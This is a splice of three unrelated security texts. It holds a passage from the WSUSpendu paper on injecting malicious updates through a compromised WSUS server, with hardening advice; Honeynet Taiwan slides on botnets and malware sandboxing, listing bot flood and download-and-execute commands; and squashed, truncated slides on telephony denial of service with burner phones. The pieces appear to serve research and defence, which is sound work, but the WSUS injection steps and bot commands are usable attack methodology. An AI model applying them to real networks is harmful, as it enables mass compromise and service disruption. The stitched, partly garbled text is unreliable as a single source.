input. These stored procedures will also update a state machine to change it in order to turn it into a new state. This is then the spGetNoti- ficationEventNamesToWakeUp procedure in the DispatchManagerDatabasePollingTh- readProc thread, which will be notified of the change, and that will then notify the rest of the service. Dealing with an event takes the following steps: an action is performed by an admin- istrator, which runs one of the services functions dedicated to user inputs, which in turn runs a stored procedure that deals with the specificities of this particular event and updates the state machine in the database. During the DispatchManagerDatabase- PollingThreadProc thread execution, the procedures will detect the new state of the state machine, thus discover the changes, and eventually run other stored procedures to perform whatever task that is still needed to be performed. As seen here, the whole service consists in performing requests to the database, but as said before, the core of the WSUS server really is the database, which contains all WSUS important data. 16 WSUSpendu Injecting a new update Injecting a new update in the WSUS server takes multiple steps: • connects to the SQL database, which will allow its data to be modified at will afterwards; • prepares the XML files in which the update’s prerequisites are detailed, the executed binary’s location is given and some options used by the update are provided; • upload of the executed binary on the WSUS server; • runs various SQL stored procedures to effectively add the update’s metadata into the database (which is basically the way new updates are declared); • creates a new group dedicated to targeting a WSUS client; • approves and deploys the update. 3.1 Interaction with the database If the database used by the WSUS service is a standard version of SQL Server, the connection remains classic, for authentication notably. The SQL server’s name is given in the value name of the key. If the database used is a WID (Windows Internal Database), the WSUS server is con- necting through a named pipe. This pipe is accessible through one of the following paths, according to the Windows server version: • For Windows server 2008R2 and below: • For Windows server 2012 and above: An attacker controlling a WSUS server can thus establish a connection with implicit au- thentication (every administrative local account has the requested privileges by default), without any particular limit, to the WSUS database. 3.2 Update metadata The stored procedures used to inject metadata (we will describe them later) use full XML as arguments. These XML describe the update’s metadata that we want to insert. We can find the update title (e.g. ”windows6.1-kb2862335-x64”), its description (”A security issue has been identified […]”) in all supported languages by Windows and 17 WSUSpendu by the update itself, as well as the names of various files to be installed (with at least their SHA1 hashes). These pieces of information are duplicated if the update has to be applied on 32- and 64-bits systems. Prerequisites in the XML (0)1 allow the Windows Update client to know if this particular update has to be installed, or can be ignored. In the malicious update injection case, a special care must be taken for the update to be installable by any client, without client- side limit. For the record, multiple listings of GUID usable in these rules are available on the Internet [2, 9, 10]. There are two major pieces of information for a single update. The first one describes the file used by the update (with its SHA1 hash (1) and its download URL (2)), and the arguments (3) to pass as a parameter of this binary. This first part is not directly approvable, nor it is shown in the WSUS console. The second part, which is a ”bundle update”, references the first one (4) and is injected as an approvable update, shown in the WSUS console. Once this second part is approved, it allows the clients to pull the first part, download the referenced files and execute them. (0) (1) Listing 3.2: XML example describing an update 1The (X) notation is used as a legend in the following listings. 18 WSUSpendu (4) Listing 3.3: XML example describing a bundle of updates Each part has XML-linked ”fragments”. These fragments will not be used by the server, but are given as-is to the WSUS clients. They also have update prerequisites listed and information displayed in the Windows update manager. Each fragment has a type defining its main function: • 1: Update type, used to reference the update on the client side. The XML of this type have prerequisite rules, with restrictions on the processor type, specific values in the Windows registry, specific version of such program installed, and so on; • 2: ExtendedProperties type, used by the client to fetch and execute the binary linked with the update. The XML of this type also contains the arguments to give in the binary command-line; • 4: LocalizedProperties type, contains metadata displayable on the client side, like the update’s title, its description, URLs to get more information, and so on. 19 WSUSpendu Listing 3.4: Type 2 (Extended Properties) XML fragment example, which is HTML- encoded in the database and on the network Finally, a small XML needs to be created to link each SHA1 hash of previously declared files in the aforementioned update to a URL from where the files can be downloaded. Listing 3.5: XML example describing a download URL of a file 3.3 Updateʼs binary upload The files used by the update need to be downloaded by the WSUS server for it to give it to the client when asked to. As for WSUSpect, these binary files need to be signed by a certificate stored in the WSUS server in the Trusted Root Certification Authorities or Trusted Publishers local machine stores. The binaries’ arguments are arbitrarily chosen by the attacker. To be downloadable by the WSUS server, there are various places where you can put the binaries: • Put the files on an attacker-controlled webserver, for instance on the attacker machine. This technique will be avoided as at some point it might let the WSUS server unable to download the file if the attacker has finished the pentest; • Put the files in the format , where: • is the root directory as used by the WSUS service. Its value can be retrieved in the column of the table in the WSUS database, • is the last byte, in the hexadecimal format, of the SHA1 hash of the file, • is the SHA1 hash, in the hexadecimal format, of the file; • Use the IIS webserver from the WSUS server to serve the file, and use this kind of URL: in the XML (listing 3.5). As described in the WSUSpect article, the PsExec and BgInfo binaries, from the Sysin- ternals suite, can be used for this kind of attack. They both are signed by Microsoft and 20 WSUSpendu can execute arbitrary commands through their command-line arguments. The binary signature checking is done twice: by the server just after having downloaded the binary (which is done, by default, once the update has been approved), before using it for any purpose, and by the client, also just after having downloaded the binary. The choice to use one binary or the other depends on the scenario played. For instance, PsExec is more often detected as a malicious hacking tool by antivirus solutions. BgInfo, however being less subject to antivirus detection, needs a script to execute as argument, and not directly the executed command. This script thus needs to be available from the client downloading the update, which can be a hard-to-achieve prerequisite depending on the network architecture. Note that other binaries, like MSBuild and InstallUtil, might be able to achieve the same utility, but have their specific requirements. 3.4 Injecting in the database There are five stored procedures which have to be used to effectively inject an update in the database, thus in the WSUS service. These four procedures need to be called twice: once for the fiel to execute (listing 3.2), then for the bundle (listing 3.3). The first stored procedure is called spImportUpdate. This one takes the first XML (list- ings 3.2 or 3.3) as an argument, potentially compressed in a cabinet (.cab) file, and a local upstream server identifier, used when multiple WSUS servers are available on the network. The procedure returns the insert status (whether it has been injected or not) and a local identifier, uniquely identifying the inserted update on the server. The latter parameter will be given to some of the following stored procedures. The second procedure to call, spSaveXmlFragment, has to be called for each fragment associated to the XML given the first stored procedure. This spSaveXmlFragment pro- cedure takes the update GUID (found at the begining of the listings 3.2 or 3.3 as the UpdateID). Then, it’s the spSetBatchURL that has to be called. This procedure links, from the listing 3.5, the download URL to the SHA1 hash of the files in the database. The URL from this XML is used by the WSUS server to download the files associated by an update when this update is approved. The WSUS server can also be configured to download the update files as soon as the update is inserted, but that is not the default. As a side note, if the WSUS server is not able to download all the files associated with an update, the update will never be seen as a new update by any client. Finally, the two stored procedures spDeploymentAutomation and spProcessPrerequi- sitesForRevision take the local update identifier returned by the spImportUpdate call. spDeploymentAutomation is needed for triggering automatic approval, if the update corresponds to the activated criteria as positioned by the WSUS server’s administrator. spProcessPrerequisitesForRevision is creating automatic deployment links: once the in- 21 WSUSpendu serted update is deployed, every update on which this one depends will be pulled to be installed by the client to assure stability. In the case of a malicious update, this procedure is not necessary as our update will be independent from the others. 3.5 Targeting a specific client The update in itself can be deployed on every client of the same WSUS group. To target a specific client, one would thus need to move this client into a dedicated group. Creating a WSUS group can be done through the call of the spCreateTargetGroup stored procedure, which takes its new name and the GUID assigned to this group as arguments. The spAddTargetToTargetGroup can then add the target client into the newly-created group. This latter procedure takes the group’s GUID and the local iden- tifier for the targeted client. This identifier can be retrieved using the spGetComputer- TargetByName procedure, which takes the fully-qualified domain name (FQDN) of the targeted client as an argument. Adding a client into a newly-created group using the spAddTargetToTargetGroup pro- cedure does not remove the client from its former group, allowing for the updates from the latter to still be applied. This is not something the WSUS interface allows to do, but it is possible through the direct use of the stored procedures from the database. It is obviously possible to add more than one client to this group, enlarging the com- promise, to target for intance all domain controllers or all workstations used by the administrators. 3.6 Update deployment Approving the update through the stored procedure spDeployUpdate announces the effective deployment of the update on the targeted client. This procedure takes the update identifier and the target group GUID on which the update has been approved as arguments. The update identifier to give is the one of the bundle update. The WSUS service’s state machine is then triggered following spDeployUpdate execu- tion to download the binary, if not already done, as it is configured by default. 22 WSUSpendu Introducing WSUSpendu A tool has been created to automate the aforementioned actions needed to inject an attacker-controlled update. This tool is freely available at the following address: . This tool’s goal is to gain administrative access of WSUS server’s clients. It has been developed in PowerShell, and runs natively [4] without additional modules. The idea here is to show that a simple script, adapted for any Windows Server version, can be developed easily. For instance, the SQL server connection is done through the use of .Net objects: Listing 4.6: PowerShell database query example The script needs either PsExec or BgInfo, the only two binaries known to have an Authen- ticode signature by Microsoft that can execute arbitrary commands on any Windows systems. The script takes the binaries arguments in parameter and automatically in- jects the chosen binary and crafted metadata into the database (cf. listing 4.7 and figure 4.6). The PowerShell script, as well as the chosen binary, needs to be uploaded to the WSUS server for a local execution. Listing 4.7: Wsuspendu.ps1 injection example, using PsExec as a signed binary Next time the client will get its new-updates list, a new update will appear (cf. figure 4.7), one which has been designed to be downloadable and installable. The update will then be subject to the client’s configuration, whether it has been configured to automatically or manually install updates. The new update in itself is able to be installed without any user interaction. 23 WSUSpendu Figure 4.6: What it looks like from the WSUS console. Figure 4.7: Notification of the new injected update, which needs to be downloaded and installed, to the client. 24 WSUSpendu Auditing WSUS The update process is a fundamental part of a security assessment. However, check- ing this process is functioning smoothly is not something easily done. This checking is usually limited to a set of representatives workstations and servers. But a critical vulnerability only on one workstation can lead to catastrophic results. The MS14-018 vulnerability shows an example of such critical vulnerability on domain controllers: one of them presents this vulnerability and the entire Active Directory is given to a potential attacker. In such cases, how can we have a glimpse of the vulnerability state of all the computers? Having access to the WSUS server will help us in this auditing task, as any update action is logged in the WSUS database. It is thus easy to request data from this database in order to know each update deployment state. Moreover, as the WSUS server is a centralized system, the information got from the database are canonized: for instance, dates of updates apply are stored in a universal format, whereas they are stored as locale-dependent when installed on the final systems. Therefore, a US or GB system won’t have the same date format as for FR systems. When parsing automatically the dates, this is an important problem to have in mind. As per the problems explained in this paper, the audit will have two major parts. The first part will deal with the WSUS server in itself, where this server has to be well-configured not to decrease the overall security level (cf. sections 1.3 and 3.6). The second part is a more traditional one and concerns the effective updates deployment state. It is possible to get the following check points (not an exhaustive list): • WSUS server parameters (TLS usage, upstream and downstream servers, and so on); • last synchronization on the Microsoft Update servers; • connections to potential other WSUS servers, and how this connection is done; • listing of the registered machines in the WSUS server; • listing of the machines by operating system; • breakdown by machine category (servers, workstations, and so on); • listing of machines with a lot of unpatched vulnerabilities; • listing of declined updates; • update apply state per machine, with their apply date. Database requests also allow for linking Knownledge Base (KB) numbers with Microsoft Security Updates (MS). This linkage will please every auditor trying to make this work out from the Microsoft website. 25 WSUSpendu One of the main points when checking updates states is validating which update su- persedes which, and which one is superseded by which. Indeed, it sometimes happens that updates are delivered by Microsoft, but then revised with a new update, making the first one useless. From the WSUS server point-of-view, the first one will be switched to a ”not applicable” state and will not be delivered anymore. This superseding mechanism has to be taken into account while checking for the update apply as a vulnerability might have been patched in multiple updates, one superseding another. An auditor then needs to know the dependencies implied by this superseding mechanism, which could be rapidly unmanageable. One of the answers to this problem could be to have faith in the MBSA [7] tool provided by Microsoft to filter out the results given by the WSUS audit. The script has been written to ease requests. It allows to run all those requests and get the answers for auditing purposes. 26 WSUSpendu Microsoft network architecture issues 6.1 Administration principles Windows systems administration principles may be difficult to put in place, but applying them on a day to day basis can be even much more difficult: single-sign on authentica- tion constrains authentication secrets to be in memory on each system a user is logged on. A resource in a distinct sensitivity level should not depend of an administrator on another sensitivity level. Indeed, the compromise of a lower-sensitivity resource will lead up to the theft of upper-level administrator’s credentials. On the other hand, the compromise of a lower-sensitivity administrator’s workstation administering an upper- sensitivity resource will lead up to the compromise of upper-level credentials. In both cases, authentication secrets can be reused to pivot and propagate inside the network. From this ascertainment, Microsoft [11] is providing a paper about securing the admin- istration architecture, with the clean source principle. Microsoft describes the notion of control between objects in this paper, which can also be illustrated by the ADCP (Active Directory Control Path) tool [5] of the French cyberdefense agency (ANSSI). As we have seen it, it is possible to compromise WSUS clients when the WSUS server is already compromised, thus the existence of a control relationship from a WSUS server to the systems this server update. The WSUS servers delivering updates to the domain controllers therefore need to be treated at the same sensitivity level as these domain controllers. These WSUS servers have to get their updates from Microsoft, without another WSUS server in-between, especially if of a lower-sensitivity level. Microsoft Update servers, the first upstream of all WSUS servers, have to be considered as neutral: the updates they are delivering are provided in a secure way and have to be applied. 6.2 One WSUS server for multiple forests A lot of organizations have multiple independent Active Directory forests. This archi- tecture is often chosen in order to have distinct security frontiers. However, it seems more often than not that the WSUS servers are chained between these forests: a unique update policy allows for reducing updates qualification costs. As seen above, this dangerous relationship establishes a control path. The compromise of one domain inside one of the upstream forest, from the WSUS point-of-view, leads up to the compromise of all downstream forests. The Active Directory security frontier is therefore broken by this new control relationship. 27 WSUSpendu 6.3 A WSUS server for a disconnected network The disconnected network scenario shows more problems for trusting updates. If a network is disconnected, it is usually because of its sensitivity. However, updates ap- plied on these networks come from an Internet-connected WSUS server. Moreover, updates are usually qualified only once: on the WSUS server which is connected to Internet. Administrators thus approve automatically updates, already qualified, on the disconnected network. Moreover, with automatic approvals, the network takeover can happen as soon as the copy is finished on the disconnected WSUS server, without any administrator interven- tion. In the same idea, it should be possible to add a trigger detecting the copy on the disconnected network to add and approve a malicious update - detecting the change of network is left as an exercise to the reader. Moreover, triggers are a key place to put a backdoor on the server... This situation thus shows an easy and automatic way to take control of disconnected networks, which is critical. 28 WSUSpendu Recommendations Securing a Microsoft update architecture comes by taking care of the various security problems exposed throughout this whole article. A hardening step has to be done on the WSUS service in itself, but a well-thought architecture is also a mandatory step. 7.1 Securing the WSUS service itself The correct WSUS configuration mainly relies on activating the TLS layer for clients requests. This configuration can be done in three steps [8]: • generate a certificate; • activate the TLS configuration on the WSUS server; • activate the TLS configuration on the WSUS clients. Generating a TLS certificate can be achieved with IIS manager. It is possible to sign one’s certificate by a local PKI or by an external third-party. The certificate then needs to be linked to the WSUS website in IIS’ configuration. TLS has to be required for the fol- lowing virtual roots: APIRemoting30, ClientWebService, DSSAuthWebService, Server- SyncWebService and SimpleAuthWebService, found inside the WSUS website. The fi- nal step is to force the TLS usage on the WSUS root server, using wsusutil: where stands for the DNS name of the WSUS server. Activating TLS connections on WSUS clients can be achieved by using the GPO mech- anism. Beware that the server’s certificate has to be deployed on the clients if it is not signed by a trusted third-party already in place on the various clients. 7.2 Multiple WSUS servers architectures WSUS server dependency against another functional domain can be enlarged outside updates services’ scope. From a broad point-of-view then, if, for any reason, separation between environments has been decided, it is mandatory for administrative and support services not to depend on another functional domain. This situation is therefore applicable for administrators, their workstations, the network managing infrastructures like SCCM, control and supervise infrastructures like SCOM, backups, and finally for the point of this article, update services such as WSUS. On the other hand, a control relationship can be exploited by means such as explained throughout this article. 29 WSUSpendu 7.3 Disconnected networks case The disconnected networks case is more complex. Indeed, having a WSUS server, normally responsible for applying updates thus increasing security, propagating viruses would be disastrous. If the update process is propagating viruses, the tendency would be to stop applying updates on the disconnected networks altogether. Good security practices would of course disagree with this ”solution”. However, care must be taken to avoid giving an attacker an easy access to a disconnected network. One would thus build a WSUS server on the Internet network which would not depend on any Windows domain (cf. previous recommendation). Its authentication would be local only, and a specific hardening would have been applied in order to limit its at- tack surface to a minimum (no more service than necessary, bad-ass passwords, local network filtering, and so on). Updates then need to be synchronized regularly with Mi- crosoft Updates services, before putting the data on the upper-level, the disconnected network. The use of a proxy to avoid the server going straight on the Internet, can be achieved if it is not configured to break TLS streams. Of course, putting the data on the upper-level has to be done by disconnection from the Internet network, then connection to the disconnected network, or by the use of a one-way diode. Passing data from the upper-level to the Internet-connected network has to be prohibited by all means. The most often seen configuration during security assessment is using the virtualization technology, so the following procedure could be done for these situations: 1. WSUS server is a virtual machine on an hypervisor. This latter is out-of- bounds from the rest of the network (authentication, network filtering, and so on); 2. both WSUS VM and the host have seen their configuration hardened (au- thentication, updates, local filtering, exploit mitigations, and so on); 3. both WSUS VM’s and host’s administration are done through a physical ac- cess onto the machine; 4. the WSUS server is synchronized with Microsoft’s servers, without intermedi- ary. 5. once a day, the WSUS VM is cloned and copied onto a removable media; 6. once this removable media is on the upper-lever, on the disconnected net- work, the VM can be copied, booted, and used; 7. once these operation are done, the removable media data can be erased. 30 WSUSpendu Conclusion WSUS is a core component on which Windows networks rely on, as well as other ser- vices (Active Directory, SCOM, SCCM, and so on). As these other services, particular configuration switches need to be in place to improve this component’s security. Other- wise, the simple presence of such a component can turn against the network’s security and play the game of an attacker, being able to compromise a lot of machines. Removing the Active Directory component of your network because the fact that it is compromised will endanger the whole network would be as stupid as removing the WSUS server, or any update mechanism, because of these new threats. This article has shown that a control relationship exists from the WSUS server to all its clients. The administrators, network architects and architecture auditors thus need to take care as to where is this server inside the network, and who is able to administrate this server. 31 WSUSpendu Bibliography [1] Wsus offline update. . [2] Andreas Brantholm. Windows Product/Update Classification Codes for SC- CM/WSUS Usage. . [3] Paul Stone and Alex Chapman. WSUSpect – Compromising the Windows Enter- prise via Windows Update. BlackHatUS, 2015. [4] Don Jones. Windows PowerShell: Doing Databases with Powershell. . [5] Emmanuel Gras, Lucas Bouillot and Geraud de Drouas. ADCP - Active Directory Control Paths. . [6] Microsoft. Message Processing Events and Sequencing Rules. . [7] Microsoft. Microsoft Baseline Security Analyzer. . [8] Microsoft. Step 3: Configure WSUS. . [9] Microsoft. Well-Known Detectoid IDs. . [10] Microsoft. WSUS Classification GUIDs. . [11] Corey Plett. Microsoft’s clean source principle. . 33 WSUSpendu
Botnet and Malware behavior analysis 蔡一郎 2010/07/17 Honeynet Project Taiwan Chapter www.honeynet.org.tw  蔡一郎 Steven  學歷:國立成功大學電機工程研究所碩士  現任:國家高速網路與計算中心 副工程師  重要經歷:  國立成功大學研究發展基金會助理研究員  崑山科技大學兼任講師  台南科學園區產學協會理事  Honeynet Project Taiwan Chapter負責人  自由作家  電腦圖書著作33本  Information Security(資安人)、Linux Guide、NetAdmin專欄,計60餘篇  專業證照:  RHCE、CCNA、CCAI、CEH、CHFI、ACIA、ITIL Foundation、ISO 27001 LAC、ISO 20000 LAC 2 Google Me. Honeynet Project Taiwan Chapter www.honeynet.org.tw Outline  Honeynet and Botnet  Honeynet Project introduction  Taiwan Chapter introduction  What is Honeypot and Honeynet  Honeynet Project Tools  TWMAN 3 Honeynet Project Taiwan Chapter www.honeynet.org.tw  Where can find Malware sample?  User、provider、Honeynet…  What is the behavior about Botnet?  Network connection、system modify…  Multi Function  bots 4 Honeynet and Botnet Honeynet Project Taiwan Chapter www.honeynet.org.tw  Non-profit (501c3) organization with Board of Directors.  Funded by sponsors  Global set of diverse skills and experiences.  Open Source, share all of our research and findings at no cost to the public.  Deploy networks around the world to be hacked.  Everything we capture is happening in the wild.  We have nothing to sell. 5 Honeynet Project introduction Honeynet Project Taiwan Chapter www.honeynet.org.tw  A community of organizations actively researching, developing and deploying Honeynets and sharing the lessons learned.  Awareness: 增進企業與組織對存在於現行網路上的威脅與 弱點之了解,進一步思考如何去減輕威脅的方法  Information: 除了提供基本的攻擊活動外,進一步提供更關 鍵性的資料,如: 攻擊動機,駭客間如何聯絡,駭客攻破主機 後下一步的攻擊動作  Tools: Honeynet Project 致力於發展 Open Source Tools,藉 由這些Tools,我們可以更有效率的佈建誘捕系統了解網路環 境攻擊威脅現況 6 Honeynet Project Mission Honeynet Project Taiwan Chapter www.honeynet.org.tw 7 Honeynet Project 全球支會分布 Taiwan Chapter Honeynet Project Taiwan Chapter www.honeynet.org.tw  What is a Honeynet ?  High-interaction Honeypot  It is an architecture, not a product or software  Populate with live systems  Once compromised, data is collected to learn the tools, tactics, and motives of the Blackhat community  Value of Honeynet  Research : Identify new tools and new tactics, Profiling Blackhats  Early warning and prediction  Incident Response / Forensics  Self-defense 8 Honeypot/Honeynet Technology Honeynet Project Taiwan Chapter www.honeynet.org.tw  Hundreds of scans a day.  Fastest time honeypot manually compromised, 15 minutes (worm, under 60 seconds).  Life expectancies: vulnerable Win32 system is under three hours, vulnerable Linux system is three months.  Primarily cyber-crime, focus on Win32 systems and their users.  Attackers can control thousands of systems (Botnets). 9 The Threat Honeynet Project Taiwan Chapter www.honeynet.org.tw  Large networks of hacked systems.  Often thousands, if not tens of thousands, of hacked systems under the control of a single user.  Automated commands used to control the ‘zombies’. 10 Botnets Honeynet Project Taiwan Chapter www.honeynet.org.tw  After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.  The binary is started, and connects to the hard-coded master IRC server.  Often a dynamic DNS name is provided rather than a hard coded IP address, so the bot can be easily relocated.  Using a special crafted nickname like USA|743634 the bot joins the master's channel, sometimes using a password to keep strangers out of the channel 11 How They Work Honeynet Project Taiwan Chapter www.honeynet.org.tw 12 Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled? Honeynet Project Taiwan Chapter www.honeynet.org.tw 13 IRC BOT Honeynet Project Taiwan Chapter www.honeynet.org.tw  Botnets sold or for rent.  Saw Botnets being stolen from each other.  Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information. 14 Botnet Economy Honeynet Project Taiwan Chapter www.honeynet.org.tw A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.  Data Control  Data Capture  Data Analysis 15 How it works http://www.honeynet.org/papers/honeynet/ Honeynet Project Taiwan Chapter www.honeynet.org.tw Honeynet Project Tools  Capture BAT  Capture-HPC  Google Hack Honeypot  HIHAT(High Interaction Honeypot Analysis Toolkit  HoneyBow  HoneyC  Honeyd 16  Honeymole  Honeysnap  Honeystick  Honeytrap  Honeywall CDROM  nepenthes  Pehunter  Sebek  Tracker Honeynet Project Taiwan Chapter www.honeynet.org.tw 17 Honeynet Project Tools Honeynet Project Taiwan Chapter www.honeynet.org.tw  Virtual Machine Honeynet  Advanced Server(128GB Memory)  Blade Server(SAS or SSD HDD)  VMWare ESX/vSphare  1200+ Servers, Windows XP/Vista, Linux, FreeBSD  High Interaction and Low Interaction Honeypots  Distribution Honeynet/Honeypot  Taiwan Education Network  Taiwan Chapter members  GDH Project 18 Our Environment Honeynet Project Taiwan Chapter www.honeynet.org.tw  Large-Scale VM-based Honeynet Deployment  Malware Collection and Analysis  Honey-Driven Botnet Detection  Client-Side Attack  Malicious Web Server Exploring  RFI Scripts Detection  Fast-Flux Domain Service Tracking  Research Alliance  Distributed Search and Analysis on Honeynet Data 19 Research Project & Achievements Collection Analysis Detection Tracking Reaction Honeynet Project Taiwan Chapter www.honeynet.org.tw 20 Botnet Detection Botnet搜尋引擎 Bot-Infected 分析 惡意網頁分析 CWsandbox TWMAN 惡意程式行為分析 Botnet C&C Security Dashboard 事件通報 Honeynet Project Taiwan Chapter www.honeynet.org.tw 21 Botnet analysis in global Honeynet Project Taiwan Chapter www.honeynet.org.tw  TaiWan Malware Analysis Net  Open Source malware analysis Net  Project  http://twman.sourceforge.net/  http://twman.openfoundry.org/  Behavior analysis  Multi-Platform(OS) 22 Why is TWMAN Honeynet Project Taiwan Chapter www.honeynet.org.tw  Two composed:  Malware behavioral analysis agent  Ontology agent  Collects the malware behavioral information to build:  malware behavioral ontology  malware behavioral rules.  Malware behavioral ontology, which is store in an ontology repository.  TWMAN will protect the computers from the attack of malware, computer viruses and Trojans etc... 23 Taiwan Malware Analysis Net ( TWMAN ) Honeynet Project Taiwan Chapter www.honeynet.org.tw  Development  Truman, The Reusable Unknown Malware Analysis Net  NCHC Clonezilla  INetSim, Internet Services Simulation Suite  Co-operation  Honeynet  Nepenthes  Dionaea  Search engine  Splunk  Virus Scanner  Virus Total 24 TWMAN Honeynet Project Taiwan Chapter www.honeynet.org.tw 1.Collect 2.Analysis 3.Build Honeynet Project Taiwan Chapter www.honeynet.org.tw Taiwan Malware Analysis Net, TWMAN - Analysis Report 臺灣惡意程式分析網,抬丸郎 - 分析報告 Last Update : 2010-06-20 http://twman.sourceforge.net >> Summary report for 81ae20781a0fb227ad17952aec5c4493 created at Tue Apr 20 19:02:44 CST 2010 << >> Host file changes - Host File 被修改處 << >> Registry Run Key changes - Registry Run Key 被修改處 << >> Registry Service Key changes - Registry Service Key 被修改處 << -WZCSVC|Wireless Zero Configuration|%SystemRoot%\System32\svchost.exe -k netsvcs|Share_Process|Auto Start|TDI +{33F3B709-064F-4FF7-95BD-434D50D67CCC}||||| >> 網路連線記錄 << IP > UDP, length 34 IP > UDP, length 473 IP > UDP, length 48 IP > UDP, length 48 IP > tcp 0 IP > tcp 204 IP > tcp 0 IP > tcp 983 IP > tcp 0 IP > tcp 0 >> NPASCAN - 警政署惡意程式偵測工具 << -==<<警政署惡意程式偵測工具 NPASCAN v1.7 >>==- Current User : TWMAN-SINGLE-01\Administrator Current IP : Start Time : 20 April 2010 18:51:23 ------------------Start Scan----------------------- 掃瞄完成!!未偵測到相關惡意程式! -------------------End Scan------------------------ >> CWSandBox VirusScan Report << VSCAN Version:3.2.1861.2 (Feb 22 2009 19:30:04);run at:: Apr 20 10:54:01 2010 defs version: 5444 (2009-10-12T17:47:12) command line: c:\SBScanV3\vscan /l c:\virus.txt /def c:\SBDefsV3 C:\WINDOWS\system32\sandnet.exe [ 15], No threat , , , ,C:\WINDOWS\system32\sandnet.exe 1 objects processed in 0 secs, 0 fps 0 threats detected, 0 suspicious files >> Advanced Intrusion Detection Environment-檔案異動偵測 << Start timestamp: 2010-04-20 19:02:15 Summary: Total number of files: 29933 Added files: 20 Removed files: 0 Changed files: 19 --------------------------------------------------- Added files: --------------------------------------------------- added: /mnt/images/Documents and Settings/Administrator/twman.cgi@res=startfauxserver.2 added: /mnt/images/Documents and Settings/Administrator/wget-log.5 added: /mnt/images/Documents and Settings/Administrator/wget-log.6 added: /mnt/images/System Volume Information/_restore{399113A8-6E6F-4DCA- A398-D03564F81D09}/RP24/A0003606.ini added: /mnt/images/System Volume Information/_restore{399113A8-6E6F-4DCA- --------------------------------------------------- Changed files: --------------------------------------------------- changed: /mnt/images/Documents and Settings/Administrator/Local Settings/Temp/AdobeARM.log changed: /mnt/images/Documents and Settings/Administrator/Local Settings/Temp/jusched.log changed: /mnt/images/System Volume Information/_restore{399113A8-6E6F- 4DCA-A398-D03564F81D09}/RP24/change.log changed: /mnt/images/WINDOWS/Prefetch/NOTEPAD.EXE-336351A9.pf changed: /mnt/images/WINDOWS/Prefetch/NPASCAN.EXE-1F4DCEFB.pf changed: /mnt/images/WINDOWS/Prefetch/NTOSBOOT-B00DFAAD.pf changed: /mnt/images/WINDOWS/system32/wbem/Logs/FrameWork.log changed: /mnt/images/WINDOWS/system32/wbem/Logs/wbemcore.log changed: /mnt/images/WINDOWS/system32/wbem/Logs/wbemess.log changed: /mnt/images/WINDOWS/system32/wbem/Logs/wmiprov.log --------------------------------------------------------- 臺灣惡意程式分析網,抬丸郎 - 分析報告 2010-06-20 版 4.Virus Scan 1.MD5 Info 2.Config File Change 3. Network Connect 5.File Change Honeynet Project Taiwan Chapter www.honeynet.org.tw Internet Services Simulation Suite (INetSim) SANDNET Infected Client SANNET Server IRC DNS FTP WWW Sandnet 27 Honeynet Project Taiwan Chapter www.honeynet.org.tw Taiwan Malware Analysis Net ( TWMAN@2.0 ) Server CentOS5.5 Client Windows 7 Client Vista Client Windows XP Honeynet Project Taiwan Chapter www.honeynet.org.tw  Malware and malware behavioral ontology can be solve the problems.  It will be develop by Protégé API, OWL API, SWRL API and FML.  TWMAN can integrate with a human thinking semantic model.  TWMAN@2.0  Multi OS  Multi Clients  Green Computing  Cloud Computing 29 Conclusions and Future work Honeynet Project Taiwan Chapter www.honeynet.org.tw Q & A 30 yilang@honeynet.org.tw 事件通報 security@honeynet.org.tw csirt@honeynet.org.tw
EasyToUsePDDOS :BurnerPhoneDDOS2Dollarsaday:70CallsaMin WestonHeckerSecurityExpert SystemsNetwork Analyst/Penetrations Tester/PresidentOfComputer SecurityAssociationOf NorthDakota A1 Slide 1 A1 Author, 9/16/2013 WhoamIandwhatisthistalkabout? • AboutMe:PenetrationTester,ComputerScience/Geophysics,TonsofCerts,Customexploits writtenforPMSHotelSoftware,Twowayreservationfuzzing,andRFIDScannerthatmounts underchair. • About9yearsofpentesting,disasterrecovery,securityresearch • NERC,FFIEC,ISO,GLBAandFDIC,ComplianceauditsHIPPA,Omnibus • WrotecustomexploitsandscriptsforobscureInternetServiceProvidergear • Toolsofthetrade“FleetofFakeiPhones” • ThecreationofaPhoneCallBomberfromyourGrama’s prepaidphonetoasolarpowered hackertoolhiddeninlightfixtureatapubliclibrary • Screenshotdemonstrationof15phonestakingdowna200personcallcenter • DistributedDenialofservicePhoneSystems“Whatitishowitsused”“HowitEffects Businesses” • Alternateusesoncephonehasbeenflashedintoattackplatform. FleetofFakeiPhonesWithTeensy3.0 RFIDBadgeReader. WhatisDDOSandTDoS? Howdotheydiffer? • (DDoS)attack isanattempttomakeamachineor networkresourceunavailabletoitsintendedusers. Althoughthemeanstocarryout,motivesfor,and targetsofaDoS attackmayvary,itgenerallyconsists ofeffortstotemporarilyorindefinitelyinterruptor suspendservicesofahostconnectedtotheInternet. • TelephonyDenialofServiceorTDoS isafloodof unwanted,maliciousinboundcalls.Thecallsare usuallyintoacontactcenterorotherpartofan enterprise,whichdependsheavilyonvoiceservice. • DefinitionpulledfromWikipedia.com InstancesofTDOS • Bankfraud“CNP”Theft • Banktransfermulescams • UnintentionalfromspoofedscammerCID • Callcenterattacks • Politicallymotivatedactivism CurrentMethodsofTDOS CallerIDSpoofReflectionAttack Malwareonphonesandcallmanagementsoftware Scripttoloadcallerinformationontorealtorwebpage HijackedPRIandSIPServicesWarDialing CallerIDreflectionattack Legitimatephoneservicewith spoofedCallerIDinformation Thousandsofcallsreturnedtothe numberthattheybelievecalledthem UsingsalesmentoTDOSforyou. Pagewithgenerictemplates. Inputfieldsautomaticallyfilledin. Inputforscript,listofURLSand informationoffofinputfield. Listof4500+pagesthatareautopopulated fromatextdumpfromrealtorkeywork crawl. WebCrawlingBots 76%ofRealtorWebpagesusethe samescriptsdon’tusecaptchas Scriptpoststo4600+realtorpages in2hrs. Botnetsofinfectedsmartphones Justlikecomputerssmartphones havebecomeaplatformforbotnets. Increasein“rooted”phonesopens doorstosecurityrisks. HowIdevelopedaWeaponized OEM cellphoneplatform PrepaidCellPhonesRunningBrew3.1 